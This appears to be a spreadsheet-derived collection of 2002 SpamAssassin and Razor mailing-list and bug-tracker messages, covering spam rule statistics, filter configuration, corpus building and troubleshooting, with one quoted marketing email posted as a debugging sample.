  0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA17
  1.125    3.523    0.010    1.00    0.68    0.01  T_HTML_IMAGE_AREA12
  0.741    2.314    0.010    1.00    0.65    0.01  T_HTML_IMAGE_AREA13
  1.542    4.732    0.058    0.99    0.58    0.01  T_HTML_IMAGE_AREA11
  0.139    0.417    0.010    0.98    0.54    0.01  T_HTML_IMAGE_AREA08
  0.483    1.397    0.058    0.96    0.50    0.01  T_HTML_IMAGE_AREA03
  0.192    0.500    0.048    0.91    0.44    0.01  T_HTML_IMAGE_AREA06
  0.820    1.834    0.349    0.84    0.39    0.01  T_HTML_IMAGE_AREA04
  0.946    2.022    0.446    0.82    0.38    0.01  T_HTML_IMAGE_AREA01
  0.569    0.896    0.417    0.68    0.32    0.01  T_HTML_IMAGE_AREA05
  6.498    0.500    9.287    0.05    0.02    0.01  T_HTML_IMAGE_AREA09Spam % of all rules with S/0 &gt; 0.90: 20.615%=============================The total number of IMG tags is really easy to do.  0.648    2.043    0.000    1.00    0.81    0.01  T_HTML_NUM_IMGS08
  0.609    1.918    0.000    1.00    0.80    0.01  T_HTML_NUM_IMGS09
  0.490    1.543    0.000    1.00    0.79    0.01  T_HTML_NUM_IMGS10
  0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_NUM_IMGS14
  0.986    3.064    0.019    0.99    0.63    0.01  T_HTML_NUM_IMGS06
  2.303    7.150    0.048    0.99    0.62    0.01  T_HTML_NUM_IMGS11
  0.033    0.104    0.000    1.00    0.61    0.01  T_HTML_NUM_IMGS17
  0.787    2.439    0.019    0.99    0.61    0.01  T_HTML_NUM_IMGS12
  0.344    1.063    0.010    0.99    0.60    0.01  T_HTML_NUM_IMGS13
  0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_NUM_IMGS20
  0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_NUM_IMGS16
  0.860    2.627    0.039    0.99    0.57    0.01  T_HTML_NUM_IMGS05
  0.754    2.293    0.039    0.98    0.56    0.01  T_HTML_NUM_IMGS07
  0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_NUM_IMGS18
  0.887    2.627    0.078    0.97    0.52    0.01  T_HTML_NUM_IMGS04
  1.356    3.711    0.262    0.93    0.47    0.01  T_HTML_NUM_IMGS03
  0.046    0.125    0.010    0.93    0.46    0.01  T_HTML_NUM_IMGS15
  6.061   10.256    4.110    0.71    0.34    0.01  T_HTML_NUM_IMGS01
  0.040    0.063    0.029    0.68    0.32    0.01  T_HTML_NUM_IMGS19
  6.233    4.753    6.921    0.41    0.22    0.01  T_HTML_NUM_IMGS02Spam % of all rules with S/O &gt; 0.90: 31.25%=========================I figured that spam that is made up of only images is going to only
have IMG tags interspersed with table, paragraph and linebreak tags,
and some whitespace, so there would be a lot of IMG tags with no plain
text (non-whitespace) between them.  So I defined consecutive IMG tags
to be ones with no text between them, and looked at the longest run of
consecutive IMGs within a message.This one seems to do pretty good, because in my non-spam corpus
there's only a handful of messages with IMG runs larger than two.  0.450    1.418    0.000    1.00    0.78    0.01  T_HTML_CONSEC_IMGS06
  0.232    0.730    0.000    1.00    0.74    0.01  T_HTML_CONSEC_IMGS08
  0.205    0.646    0.000    1.00    0.73    0.01  T_HTML_CONSEC_IMGS11
  1.813    5.691    0.010    1.00    0.71    0.01  T_HTML_CONSEC_IMGS02
  1.019    3.189    0.010    1.00    0.67    0.01  T_HTML_CONSEC_IMGS03
  0.768    2.397    0.010    1.00    0.66    0.01  T_HTML_CONSEC_IMGS05
  0.053    0.167    0.000    1.00    0.64    0.01  T_HTML_CONSEC_IMGS12
  1.006    3.127    0.019    0.99    0.63    0.01  T_HTML_CONSEC_IMGS04
  0.483    1.501    0.010    0.99    0.62    0.01  T_HTML_CONSEC_IMGS07
  0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_CONSEC_IMGS13
  0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_CONSEC_IMGS15
  1.032    3.148    0.048    0.98    0.57    0.01  T_HTML_CONSEC_IMGS10
  0.199    0.605    0.010    0.98    0.57    0.01  T_HTML_CONSEC_IMGS09
  0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_CONSEC_IMGS17
  0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_CONSEC_IMGS19
  0.007    0.021    0.000    1.00    0.51    0.01  T_HTML_CONSEC_IMGS14
  7.080    7.484    6.892    0.52    0.26    0.01  T_HTML_CONSEC_IMGS01
  0.000    0.000    0.000    0.00    0.00    0.01  T_HTML_CONSEC_IMGS16
  0.000    0.000    0.000    0.00    0.00    0.01  T_HTML_CONSEC_IMGS18Spam % of all rules with S/O &gt; 0.90: 22.85%==========================Next I'm going to see if there's any meta rules I can make that will
reduce the FP rate for low S/O rules.-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1053------- Additional Comments From mgm@starlingtech.com  2002-10-03 21:46 -------
Looks great! One note: most "image-only" spam actually has some text (a few 
words at the top, a disclaimer at the end) so keep that in mind. The typical 
image spam that slips through SA seems to have a bit of text, one huge image, 
then a bit more.-------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</si>
  <si>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completeness.Here is what I got:OVERALL%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FROM_ENDS_IN_NUMSand my stats: 19.228   34.793   11.991    0.74    0.35    0.88  FROM_ENDS_IN_NUMS-------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</si>
  <si>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Daniel Quinlan wrote:DQ&gt; jm@jmason.org (Justin Mason) writes:
DQ&gt; 
DQ&gt; &gt; But I think rsync is key; it's very efficient bandwidth-wise, and it
DQ&gt; &gt; allows you to select which ones you want just as well as wget would.
DQ&gt; &gt; (Bandwidth is a much bigger issue for me and some other of the europeans
DQ&gt; &gt; involved, than it would be for you guys ;)  IMO it's by far the most
DQ&gt; &gt; efficient and scriptable way to do this stuff, these days.
DQ&gt; 
DQ&gt; It must be horrible being a dial-up user in 2002.  If we can *automate*
DQ&gt; rsync submission with good *authentication*, it would be fine with me.
DQ&gt; The current rsync method is not sufficiently authenticated, though.I'll take a look at it.  I'm sure there's got to be some reasonly easy way to 
have rsync carry itself over ssh and secure access using ssh keys.DQ&gt; &gt; I suggest we use the hughes-family.org server for rsyncing, as we do for
DQ&gt; &gt; the corpus_submit stuff -- in a separate subdirectory, though! -- then
DQ&gt; &gt; I'll take a look at getting a nightly hit-frequencies-collation system
DQ&gt; &gt; going.Ok, I'll take a look at it.C
</t>
  </si>
  <si>
    <t xml:space="preserve">
Randy Bush said:&gt; &gt;&gt; freebsd -stable
&gt; &gt;&gt; spamassassin 2.41
&gt; &gt;&gt;     spamasassin -r
&gt; &gt;&gt; results in
&gt; &gt;&gt; razor2 report failed: No such file or directory Razor2 reporting requires 
&gt; authentication at /usr/local/lib/perl5/site_perl/5.005/Mail/SpamAssassin/Repo
&gt; rter.pm line 77.
&gt; &gt;&gt; used to work until upgrade
&gt; &gt; 
&gt; &gt; using spamd?  try the -H switch. 
&gt; 
&gt; no, pipinng the message to "spamassassin -r" from within my mail
&gt; user agent, VM under Emacs.oops, sorry -- didn't notice the "report" bit.  Yes, you need to register
for Razor2 -- "razor-register" or "razor-admin -register" if I recall
correctly.--j.</t>
  </si>
  <si>
    <t xml:space="preserve">In emacs rmail what varieties of different techniques are there for
sorting your favorite correspondents from the mix?... leaving the hundreds
of spam commercials. A filter for the campus computer system puts subject
lines and headers on many of the hundreds of spam commercials
with http://spamassassin.org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</si>
  <si>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Kenneth Nerhood said:&gt; I too am seeing very weird things with 2.42 and AWL.  I  installed a
&gt; fresh system, and then ran a bunch of test spam through it (all from the
&gt; same user).  All messages should have scored over 15.  The AWL kept
&gt; adjusting them down so that after about 10 message I had a negative
&gt; score.  I'm using spamc/d.That's exactly what is intended; the idea is that legit senders who
habitually score just &gt; 5, will eventually get out of "AWL hell" after
6-10 messages.Note that running a single spam through "spamassassin -a -t" *will*
eventually whitelist the spammer.  but that's why the man page tells you
not to do it ;)--j.
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t>I don't know how make of you are in the Bay Area but EFF is having a benifit 
party ast the DNA Lounge in San Francisco tonight. Wil Weaton (Wesley Crussher 
from star Trek TNG) will fight Barney the Dinasour.Come on by if you're not doing anything.-------------------------------------------------------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</si>
  <si>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
On Thursday, August 22, 2002, at 10:24  AM, Justin Mason wrote:&gt; I plan to
&gt;
&gt; 1. figure out the freqs tonight, suggest what tests to drop
&gt; 2. wait for comments
&gt; 3. drop tests that nobody cares about tomorrow
&gt; 4. sed out the dropped tests from the mass-check logsThis step is unneccesary -- unless you've changed the scripts 
much, any test in the logs which aren't in the rules files will 
just be ignored I think.  You do seem to have changed the 
logs-to-c script and removed the bit where you could specify 
immutable tests at the top -- I took a brief glance through the 
code and couldn't fully make out how it had changed.  I think we 
want to be able to specify immutable test scores though in there 
somewhere -- or is that now handled by the tflags stuff?  For 
the last couple releases, any test which occurred infrequently 
(by thumb-in-the-wind subjective criteria) I set to have 
immutable scores, as well as a handful of other rules.&gt; 5. kick off the GA
&gt;
&gt; BTW I'll be away this weekend at Linuxbierwanderung, so Craig, 
&gt; you might
&gt; have to run the GA. ;)Shouldn't be a problem.  Assuming I can get the darned thing to 
compile :)C
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1075spamassassin-contrib@msquadrat.de changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
                 CC|                            |spamassassin-
                   |                            |devel@lists.sourceforge.net
         AssignedTo|spamassassin-               |spamassassin-
                   |devel@lists.sourceforge.net |contrib@msquadrat.de-------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</si>
  <si>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
"Steve Thomas" said:&gt;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razor.FWIW, I would now recommend doing this (using a user with a procmailrc)
instead of a system alias; more secure, and easier to filter out crud
like bounces, virii etc. that render a corpus dirty.--j.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</si>
  <si>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 xml:space="preserve">
Bob Sully said:&gt; Spamassassin (2.30) has been tossing my daily LogWatch (3.3) reports into 
&gt; the spam bucket.  A recent one generated the folowing hits: ....fixed in CVS I think, or at least my logwatches get through fine.  If it
is not fixed in CVS, then report it, using the correct bug-reporting
procedure:    1. open a Bugzilla bug. http://bugzilla.SpamAssassin.org/    2. attach a sample mail message *as an attachment* with all
    headers intact--j.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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=839------- Additional Comments From alan@rdrop.com  2002-09-05 22:22 -------
I haven't tried 2.41 yet because it requires File::Spec, which barfs when
spamassassin tries to use it.  I haven't filed a bug yet because I suspect it's
because I'm still running 5.005 perl because of reported compatibility issues
with 5.6 and later, but I probably will because I think there's too much legacy
perl code to put up with major compatibility problems, and spamassassin didn't,
at least in the quickest of looks, say it needed a newer one.  The perl @ stuff
was bad enough...  but this is all a separate soapbox...-------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</si>
  <si>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David HÃ¶hn wrote:
&gt; Hello, have you seen and discussed this article and his approach?
&gt; 
&gt; Thank you
&gt; 
&gt; http://www.paulgraham.com/spam.htmlYes. See the perl module Mail::SpamTest::Bayesian on CPAN, and the 
thread on sa-talk.Matt.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</si>
  <si>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
Craig Hughes said:&gt; &gt;   - All headers are reproduced in full.  Some address obfuscation has
&gt; &gt;   taken place; hostnames in some cases have been replaced with
&gt; &gt;   "spamassassin.taint.org", which should have a valid MX record (if I recall
&gt; &gt;   correctly).  In &gt; most cases though, the headers appear as they were
&gt; &gt;   received.
&gt; 
&gt; Nope:
&gt; 
&gt; [craig@balam craig]$ dig spamassassin.taint.org mxI knew there was something about spamassassin.taint.org ;)Ah well, that's probably just as good anyway...--j.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</si>
  <si>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(Please feel free to forward this message to other possibly-interested
&gt; parties.)Some caveats (in decending order of concern):1. These messages could end up being falsely (or incorrectly) reported
   to Razor, DCC, Pyzor, etc.  Certain RBLs too.  I don't think the
   results for these distributed tests can be trusted in any way,
   shape, or form when running over a public corpus.2. These messages could also be submitted (more than once) to projects
   like SpamAssassin that rely on filtering results submission for GA
   tuning and development.3. Spammers could adopt elements of the good messages to throw off
   filters.  And, of course, there's always progression in technology
   (by both spammers and non-spammers).The second problem could be alleviated somewhat by adding a Nilsimsa
signature (or similar) to the mass-check file (the results format used
by SpamAssassin) and giving the message files unique names (MD5 or
SHA-1 of each file).The third problem doesn't really worry me.These problems (and perhaps others I have not identified) are unique
to spam filtering.  Compression corpuses and other performance-related
corpuses have their own set of problems, of course.In other words, I don't think there's any replacement for having
multiple independent corpuses.  Finding better ways to distribute
testing and collate results seems like a more viable long-term solution
(and I'm glad we're working on exactly that for SpamAssassin).  If
you're going to seriously work on filter development, building a corpus
of 10000-50000 messages (half spam/half non-spam) is not really that
much work.  If you don't get enough spam, creating multi-technique
spamtraps (web, usenet, replying to spam) is pretty easy.  And who
doesn't get thousands of non-spam every week?  ;-)Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">
(trimmed cc list)Daniel Quinlan said:&gt; 1. These messages could end up being falsely (or incorrectly) reported
&gt;    to Razor, DCC, Pyzor, etc.  Certain RBLs too.  I don't think the
&gt;    results for these distributed tests can be trusted in any way,
&gt;    shape, or form when running over a public corpus.I'll note that in the README.&gt; 2. These messages could also be submitted (more than once) to projects
&gt;    like SpamAssassin that rely on filtering results submission for GA
&gt;    tuning and development.
&gt; The second problem could be alleviated somewhat by adding a Nilsimsa
&gt; signature (or similar) to the mass-check file (the results format used
&gt; by SpamAssassin) and giving the message files unique names (MD5 or
&gt; SHA-1 of each file).OK; maybe rewriting the message-ids will help here, that should allow
us to pick them out.  I'll do that.&gt; 3. Spammers could adopt elements of the good messages to throw off
&gt;    filters.  And, of course, there's always progression in technology
&gt;    (by both spammers and non-spammers).
&gt; The third problem doesn't really worry me.nah, me neither.&gt; These problems (and perhaps others I have not identified) are unique
&gt; to spam filtering.  Compression corpuses and other performance-related
&gt; corpuses have their own set of problems, of course.
&gt; 
&gt; In other words, I don't think there's any replacement for having
&gt; multiple independent corpuses.  Finding better ways to distribute
&gt; testing and collate results seems like a more viable long-term solution
&gt; (and I'm glad we're working on exactly that for SpamAssassin).  If
&gt; you're going to seriously work on filter development, building a corpus
&gt; of 10000-50000 messages (half spam/half non-spam) is not really that
&gt; much work.  If you don't get enough spam, creating multi-technique
&gt; spamtraps (web, usenet, replying to spam) is pretty easy.  And who
&gt; doesn't get thousands of non-spam every week?  ;-)Yep.  The primary reason I released this, was to provide a good, big
corpus for academic testing of filter systems; it allows results to
be compared between filters using a known corpus.For SpamAssassin development, everyone has to maintain their own corpus.--j.</t>
  </si>
  <si>
    <t>----- Original Message -----
From: 
To: 
Sent: Friday, August 23, 2002 3:05 PM
Subject: Razor-users digest, Vol 1 #346 - 8 msgs
&gt; Subject: RE: [Razor-users] Razor with sendmail
&gt; Date: Fri, 23 Aug 2002 15:03:05 -0400
&gt; From: "Rose, Bobby" 
&gt; To: "Julian Bond" ,
&gt; 
&gt;
&gt; If you didn't add it when compile would be one way.  Another would be to
&gt; grep your sendmail.cf for the word Milter.
&gt;
&gt;
&gt;
&gt; "Bort, Paul"  wrote:
&gt; &gt;If your sendmail has been compiled with Milter support, you can add=20
&gt; &gt;SMRazor easily. We've been using it for a while without problems.=20
&gt; &gt;Others on the list have mentioned it as well.
&gt; &gt;
&gt; &gt;http://www.sapros.com/smrazor/
&gt;
&gt; Is there an easy way to tell if Milter is compiled in?
&gt;To see all the options compiled into (and version of) sendmail, try the
following line:echo \$Z | /path/to/sendmail -bt -d0Sven-------------------------------------------------------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</si>
  <si>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23 Bort, Paul wrote:&gt;If your sendmail has been compiled with Milter support, you can add SMRazor
&gt;easily. We've been using it for a while without problems. Others on the list
&gt;have mentioned it as well. 
&gt;
&gt;http://www.sapros.com/smrazor/Does this fork+exec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</si>
  <si>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I'm writting a Python script, in order to use Razor with Qmail.
   The script is finish, but i want to test the result with positive
   mail (spam). Somebody knows, whrere can i find one.   PS : Escuse my pooooooor English ;-))
--
Toorop 
Lorsque que vous avez Ã©liminÃ© l'impossible, ce qui reste, 
mÃªme si c'est improbable, doit Ãªtre la vÃ©ritÃ©.
www.spoonsdesign.com-------------------------------------------------------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</si>
  <si>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Always for my script, if i run it manually in console all is ok
 whether is the user.
 But if i try to implement it in my general script filter running
 whith qmailq UID (503) : I've got 13 has exit status, and in my mail log :
 "Can't call method "log" on unblessed reference at
  /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm line 211."  My log file is in /home/user/.razor/razor-agent.log
  and have write permission for qmailq user.  Any idea ??--
Toorop 
Lorsque que vous avez Ã©liminÃ© l'impossible, ce qui reste, 
mÃªme si c'est improbable, doit Ãªtre la vÃ©ritÃ©.
www.spoonsdesign.com---------------------------------
Mail scannÃ© par Protecmail filter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</si>
  <si>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I'm not sure if this is really a razor problem/issue or a sendmail
problem. Here's the scenario... My mail server is a 150mhz PC funning
FreeBSD 4.4. Ordinarily, the machine is quite idle; it supports my
wife's web site with Apache server running on it and a few other
services (jabber, etc). Between the various members of our family, we
get a fair amount of email coming in (mailing lists, etc). On
occasion, our DSL-based ISP dies for a number of hours. When we get a
reconnection to the Internet, I get a huge flow of emails coming in
which are then filtered via razor. As a result, I will sometimes see
over 20+ sendmail processes running at the same time after such an
occasion. The machine is then REALLY slow.I noticed that my /etc/procmailrc file had had no arguments associated
with the call to razor-check. There was something in the log, though,
to make me suspicious that it was possibly not seeing all my razor
files. So I have just added "-home /etc/razor" as an argument. I
haven't had any down time since then so I cannot comment on whether
this change has sped up my razor processing a noticable amount. (This
paragraph may be an aside to my real problem, the first paragraph
above; but I thought I should be complete in my description.)At any rate, has anyone else suffered from a backlog of email
processing creating lots and lots of sendmail processes?  Is there,
perhaps, a way to limit the number of sendmail processes?Any ideas would be welcome.Thanks,
Joe
---
Joe Berry
joe@topshot.com
AIM "joe topshot"
Yahoo Msgr "joetopshot"
jabber "joetopshot@topshot.com"
Baltimore, MD-------------------------------------------------------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</si>
  <si>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See your /etc/sendmail.cf file, there are a number of methods for limiting
the number of concurrent sendmail processes, either by load average (I'm
sure), or concurrency (I think)... I use sendmail anymore (I use qmail) but
I'm sure that if you look in the config file, you will see what you need...Regards,
Adam&gt; -----Original Message-----
&gt; From: razor-users-admin@example.sourceforge.net
&gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Joe Berry
&gt; Sent: Sunday, 25 August 2002 1:44 PM
&gt; To: razor-users@example.sourceforge.net
&gt; Subject: [Razor-users] Reducing impact from tons of email
&gt;
&gt;
&gt; I'm not sure if this is really a razor problem/issue or a sendmail
&gt; problem. Here's the scenario... My mail server is a 150mhz PC funning
&gt; FreeBSD 4.4. Ordinarily, the machine is quite idle; it supports my
&gt; wife's web site with Apache server running on it and a few other
&gt; services (jabber, etc). Between the various members of our family, we
&gt; get a fair amount of email coming in (mailing lists, etc). On
&gt; occasion, our DSL-based ISP dies for a number of hours. When we get a
&gt; reconnection to the Internet, I get a huge flow of emails coming in
&gt; which are then filtered via razor. As a result, I will sometimes see
&gt; over 20+ sendmail processes running at the same time after such an
&gt; occasion. The machine is then REALLY slow.
&gt;
&gt; I noticed that my /etc/procmailrc file had had no arguments associated
&gt; with the call to razor-check. There was something in the log, though,
&gt; to make me suspicious that it was possibly not seeing all my razor
&gt; files. So I have just added "-home /etc/razor" as an argument. I
&gt; haven't had any down time since then so I cannot comment on whether
&gt; this change has sped up my razor processing a noticable amount. (This
&gt; paragraph may be an aside to my real problem, the first paragraph
&gt; above; but I thought I should be complete in my description.)
&gt;
&gt; At any rate, has anyone else suffered from a backlog of email
&gt; processing creating lots and lots of sendmail processes?  Is there,
&gt; perhaps, a way to limit the number of sendmail processes?
&gt;
&gt; Any ideas would be welcome.
&gt;
&gt; Thanks,
&gt; Joe
&gt; ---
&gt; Joe Berry
&gt; joe@topshot.com
&gt; AIM "joe topshot"
&gt; Yahoo Msgr "joetopshot"
&gt; jabber "joetopshot@topshot.com"
&gt; Baltimore, MD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</si>
  <si>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25 Joe Berry wrote:&gt;Very good advice given above.Yes :)&gt;One more problem solved.No. One more problem in some software worked around by using tricks in 
another piece of software. The solution is the aggregator.-------------------------------------------------------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</si>
  <si>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 following razor debugging sequence show my mail going from 9295 bytes to
0 bytes after the preproc runs, which gives me an exit code that is not 0.
I included the message below.FoxRazor-Log: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supported_engines: 1 2 4
Aug 26 10:28:09.506604 check[3469]: [ 8] mail 1.0 skipped in check
Aug 26 10:28:09.506686 check[3469]: [ 5] No queries, no spam
Aug 26 10:28:09.506787 check[3469]: [ 5] disconnecting from server
truth.cloudmark.com
Aug 26 10:28:09.507071 check[3469]: [ 4] truth.cloudmark.com &lt;&lt; 5
Aug 26 10:28:09.507155 check[3469]: [ 6] a=q
Aug 26 10:28:09.507959 check[3469]: [ 8] razor-check finished successfully.&gt;&gt;From bounce-html-sales1-21787251@lyris.execsoft.com Mon Aug 26 14:28:10 2002
Return-Path: 
Delivered-To: log@qmail.mckee.com
Received: (qmail 3472 invoked from network); 26 Aug 2002 14:28:10 -0000
Received: from unknown (HELO port-216-3073879-ds200.devices.datareturn.net)
(216.46.231.87)
  by 10.97.5.1 with SMTP; 26 Aug 2002 14:28:05 -0000
X-Mailer: Lyris Web Interface
Date: Sat, 24 Aug 2002 09:45:48 -0700
Subject: New Freeware Download
 - Jammed: eric_koester@ccmail.mckee.com
To: 
From: "Diskeeper Product Manager, Executive Software"List-Unsubscribe: 
Reply-To: executive@executive.com
Message-Id:MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Spam-File:
Envelope-Recipient: eric_koester@ccmail.mckee.comNew Freeware DownloadIT'S
        FREE!
Â Â Â Â Â  
Includes the same
advanced defragmentation technology
used in Diskeeper 7.0.
Â Much faster than the
previous
    Diskeeper Lite and all built-in defragmenters.
Â Now runs on Windows
NTÂ®/98/2000/XP.
Millions of downloads attest to the popularity of
Diskeeper Lite, but it only ran on Windows NT 4.0. Now it's been updated
for all
Windows operating systems from Windows 98 onward.
New Diskeeper Lite is still manual-only and cannot
be
scheduled or run across a network, but it is far superior to any built-in
defragmenter and much faster. And it will show you why full-version
Diskeeper is
the most recommended automatic defragmenter ever built. 
Find out what you are really missing.
Free!
            Full version Diskeeperavailable for purchase from:
NOTICE: We periodically send new product
information electronically or
survey those individuals who voluntarily give us their e-mail address. We
hope you enjoy receiving this timely information. However, if you would
like to remove yourself from this list, please do not reply to this e-mail
to be removed.
You have received this message from
esi-vp-marketing at the e-mail
address: eric_koester@ccmail.mckee.com
 To unsubscribe, send the above e-mail address in the body of a message
along with your name, on a separate line, to
 unsubscribe@executive.com.Â© 2002 Executive Software International,
Inc.
All Rights Reserved. DISKEEPER, Executive Software and the Executive
Software
logo are either registered trademarks or trademarks of Executive Software
International, Inc. in the United States and/or other countries. Windows
and
Windows NT are registered trademarks of Microsoft Corporation in the
United
States and/or other countries. All other trademarks and brand names are
the
property of the respective owners.
Â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</si>
  <si>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 following was personal correspondence between two people.  I can't
fathom how Razor thinks it is spam:&gt;
&gt; We are struggling with the decisions related to wether or not to
&gt; go ahead with our plans to purchase an OCR and forms
&gt; scanning solution.
&gt;
&gt; An outside consultant mentioned that he had heard that not to
&gt; long ago you folks were considering implementing OCR
&gt; technology to reduce data entry costs and improve efficiency.
&gt; If you could let us know if you did move foreward with any
&gt; plans in that direction it would be of great help to us. May I ask
&gt; what initialy prompted you to consider OCR? Did you decide it
&gt; could help your compamy? What software did you go with?
&gt; Would you recomend we take a look at it?
&gt; At present we are still planning to continue our research until
&gt; we decide which OCR system best suits our needs, then
&gt; implement it quickly.
&gt;
&gt; If you are just starting to consider this
&gt; technology feel free to stay in touch. We will let you know what
&gt; we decide on and if it works for us.
&gt;
&gt; If you cannot advise on this please forward this E-mail to the
&gt; proper individual in your company who might be able to help with
&gt; this.
&gt; Thanks,
&gt; Jay
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users</t>
  </si>
  <si>
    <t>Hello,did any of you hear about a a razor plugin for mozilla?
a plugin that would add a "report as spam" button somewhere for the user 
to report a mail as spam on a server?Arnaud
-- 
Arnaud AbÃ©lard
Administrateur rÃ©seaux et systÃ¨mes
Irin / FacultÃ© de Sciences
UniversitÃ© de Nantes-------------------------------------------------------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</si>
  <si>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No, please post a link!Fox
----- Original Message -----
From: "Arnaud Abelard" 
To: 
Sent: Tuesday, September 03, 2002 2:39 AM
Subject: [Razor-users] razor plugins for mozilla?
&gt; Hello,
&gt;
&gt; did any of you hear about a a razor plugin for mozilla?
&gt; a plugin that would add a "report as spam" button somewhere for the user
&gt; to report a mail as spam on a server?
&gt;
&gt; Arnaud
&gt; --
&gt; Arnaud AbÃ©lard
&gt; Administrateur rÃ©seaux et systÃ¨mes
&gt; Irin / FacultÃ© de Sciences
&gt; UniversitÃ© de Nantes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</si>
  <si>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Oh, I was serious. I'm awful with perl/etc. I just think the HTML graph that
was created was pretty neat and I wish I could do something like that. :-)
&gt; I can't tell if you are serious or joking.  I have a custom perl based
spam
&gt; blocking framework that uses plug-ins to block spam.  I test each message
&gt; with every plug-in and keep the stats in a mysql database, which are what
&gt; you see below.
&gt;
&gt; Fox
&gt;
&gt;
&gt; ----- Original Message -----
&gt; From: "Jonathan Nichols" 
&gt; To: 
&gt; Sent: Tuesday, September 03, 2002 2:07 PM
&gt; Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table -
Take
&gt; 2
&gt;
&gt;
&gt; &gt; How do you make up graphs like that, anyway? :-)
&gt; &gt;
&gt; &gt; ----- Original Message -----
&gt; &gt; From: "Daniel Higgins" 
&gt; &gt; To: "Fox" ; 
&gt; &gt; Sent: Tuesday, September 03, 2002 10:57 AM
&gt; &gt; Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table -
&gt; Take
&gt; &gt; 2
&gt; &gt;
&gt; &gt;
&gt; &gt; that's pretty impressive, have you seen any false positives yet? myself
&gt; i'm
&gt; &gt; still at the stage of creating the corpuses. i'll report back after i
get
&gt; &gt; some testing of my own :P
&gt; &gt;   ----- Original Message -----
&gt; &gt;   From: Fox
&gt; &gt;   To: razor-users@example.sourceforge.net
&gt; &gt;   Sent: Tuesday, September 03, 2002 12:54 PM
&gt; &gt;   Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table -
&gt; &gt; Take 2
&gt; &gt;
&gt; &gt;
&gt; &gt;   Sorry about the html, for those of you still using elm or other
non-GUI
&gt; &gt;   clients.  I don't have time to post it as text.
&gt; &gt;
&gt; &gt;   The "Spam Count" is the total of all spam detected by the various
&gt; filters.
&gt; &gt;
&gt; &gt;   Jammed is a custom phrase ranking system.
&gt; &gt;   Razored is Razor v2.
&gt; &gt;   Bayesian filter is based off of Paul Graham's work (statistical
&gt; &gt;   probability), using a corpus of 4000 non-spam and 2000 spam messages.
&gt; &gt;
&gt; &gt;         Spam Statistics
&gt; &gt;         Date Spam Count Jammed Razored Blacklisted Trollbox Bayesian
&gt; &gt;         2002-08-27 370 145    (39.19%) 181    (48.92%) 79    (21.35%)
120
&gt; &gt; (32.43%) 275    (74.32%)
&gt; &gt;         2002-08-28 397 106    (26.70%) 126    (31.74%) 163    (41.06%)
136
&gt; &gt; (34.26%) 320    (80.60%)
&gt; &gt;         2002-08-29 346 154    (44.51%) 146    (42.20%) 78    (22.54%)
101
&gt; &gt; (29.19%) 261    (75.43%)
&gt; &gt;         2002-08-30 366 163    (44.54%) 166    (45.36%) 65    (17.76%)
138
&gt; &gt; (37.70%) 272    (74.32%)
&gt; &gt;         2002-08-31 282 211    (74.82%) 133    (47.16%) 27    ( 9.57%)
132
&gt; &gt; (46.81%) 256    (90.78%)
&gt; &gt;         2002-09-01 220 127    (57.73%) 125    (56.82%) 22    (10.00%) 91
&gt; &gt; (41.36%) 157    (71.36%)
&gt; &gt;         2002-09-02 166 86    (51.81%) 77    (46.39%) 22    (13.25%) 64
&gt; &gt; (38.55%) 123    (74.10%)
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt; -------------------------------------------------------
&gt; &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
&gt; &gt; cell phone?  Get a new here for FREE!
&gt; &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
&gt; &gt; _______________________________________________
&gt; &gt; Razor-users mailing list
&gt; &gt; Razor-users@lists.sourceforge.net
&gt; &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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</si>
  <si>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Hi,Newbie (to the list) question;  I've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in)?Bill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</si>
  <si>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05, 2002 at 10:12:59PM -0400, Leland Woodbury wrote:
&gt; I found a nice little Perl script for this purpose called rotate, which 
&gt; makes the process of rotating log files very simple.  If there's an 
&gt; official source for this script, I couldn't find it.  (My hosting 
&gt; provider, pair.com, has it installed, and that's where I found it.) 
&gt;  However, redistribution appears to be allowed, so I've attached it.Thanks for the script.  It also appears that the standard logrotate tools
included with many systems (or at least RedHat systems) will support
wildcards when rotating files so something like
/home/*/.razor/razor-agent.log can be specified...-Dave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</si>
  <si>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05, 2002 at 08:53:16PM -0400,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:)Thanks for the post there, it answered all my questions about
spamassassin/razor interaction.Now for a razor question:I'm worried about having a server full of razor-agent.log files which keep
on growing.  Is it possible to configure razor log via SYSLOG to make it
easy to rotate logs?  Searching through the man pages didn't turn anything
up...  Otherwise I'll have to write a script to go through each user's home
directory looking for razor-agent.log files to rotate periodically.Thanks,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</si>
  <si>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And you were exactly the person I figured would do so. On Thu, 5 Sep 2002, Theo Van Dinter wrote:&gt;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</si>
  <si>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Shouldn't there be a w, somewhere in tehre?  Simply setting group and 
